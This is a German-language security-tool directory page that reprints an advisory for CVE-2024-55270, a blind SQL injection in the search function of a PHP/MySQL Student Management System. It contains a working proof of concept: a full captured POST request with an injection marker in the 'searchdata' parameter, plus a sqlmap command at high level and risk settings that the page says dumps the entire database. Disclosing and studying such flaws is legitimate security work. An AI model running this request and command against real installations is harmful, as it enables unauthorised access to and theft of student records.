Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-55270 — Studentenverwaltungssystem mit PHP und MySQL | Kitploit
Tools/GitHubGitHub/shoaibalam112/cve-2024-55270
SchwachstellenanalyseExploitationWebsicherheitPenetrationstestsLernen & Bildung
GitHubshoaibalam112/cve-2024-55270

CVE-2024-55270

Studentenverwaltungssystem mit PHP und MySQL

Repository anzeigen
vor 6 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Student Management System 1.0 (CVE-2024-55270)

Übersicht

Das Student Management System (SMS) ist eine Webanwendung, die mit PHP und MySQL entwickelt wurde und zur Verwaltung von Studenteninformationen dient. Dieses Repository enthält den Quellcode und die Details des Systems sowie einen Sicherheitslückenbericht.

Prüfer:
Shoaib Alam - LinkedIn-Profil


Sicherheitslückenbericht

Beschreibung

Eine Blind-SQL-Injection-Sicherheitslücke wurde im Student Management System entdeckt. Dieses Problem betrifft den Parameter searchdata in der Suchfunktion der Anwendung.

  • Gefährdeter Endpunkt: /studentms/admin/search.php
  • Gefährdeter Parameter: searchdata

Der Parameter searchdata ist aufgrund unzureichender Eingabebereinigung anfällig für Blind SQL Injection. Ein Angreifer könnte diese Sicherheitslücke ausnutzen, indem er bösartige SQL-Abfragen in die searchdata-Eingabe injiziert und sich dadurch möglicherweise unbefugten Zugriff auf die Datenbank oder andere sensible Informationen verschafft.

Proof of Concept (PoC)

Gefährdete URL

/studentms/admin/search.php

Beispiel-POST-Anfrage

root@kitploit:~
POST /studentms/admin/search.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 64
Origin: http://localhost
DNT: 1
Sec-GPC: 1
Connection: keep-alive
Referer: http://localhost/studentms/admin/search.php
Cookie: PHPSESSID=kq90r1jv25kn4flrqd74v1miqd
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i

searchdata=*&search=
  1. Speichern Sie die obige POST-Anfrage mit Notepad oder einem beliebigen Texteditor in req.txt.

  2. Verwenden Sie ein Tool wie SQLMAP, um das Obige auszunutzen, indem Sie diesen Befehl anwenden (Sie können Ihren eigenen anpassen): sqlmap -r req.txt --dbs --random-agent --level 3 --risk 3

Der obige Befehl gibt die gesamte Datenbank der Webanwendung aus.

Tool herunterladen